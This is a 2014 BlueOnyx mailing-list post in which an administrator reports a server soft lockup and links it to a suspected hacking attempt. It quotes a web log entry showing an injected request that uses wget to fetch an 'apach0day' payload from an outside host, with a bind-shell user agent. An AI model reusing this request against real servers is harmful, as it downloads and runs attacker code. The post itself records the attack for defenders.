[BlueOnyx:15727] Re: Hacking attempt?
Ernie
ernie at info.eis.net.au
Wed Jul 30 22:03:03 -05 2014
Early this morning, one of my BlueOnyx severs running on Proxmox/KVM stop
responding, with a recurring loop of errors on the console.
BUG: soft lockup - CPU#1 stuck for 67s! [http:25511]
I wonder if it could be related to the hack? that BX server has never done
that before. I had to reboot it.
- Ernie.
> Hi Alan,
>
> > I've seen a number of entries on my system log that look similar to this:
> >
> > alan.snugglebunny.us 162.253.66.77 - - [28/Jul/2014:17:07:22 -0500] "GET
> > /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day;
> > HTTP/1.0" 200 14 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"
>
> Got them as well yesterday. A quick Google search turned up this discussion:
>
> https://isc.sans.edu/forums/diary/Interesting+HTTP+User+Agent+chroot-apach0day+/18453
>
> --
> With best regards
>
> Michael Stauber
> _______________________________________________
> Blueonyx mailing list
> Blueonyx at mail.blueonyx.it
> http://mail.blueonyx.it/mailman/listinfo/blueonyx
--
"I Ping therefore I am."
More information about the Blueonyx
mailing list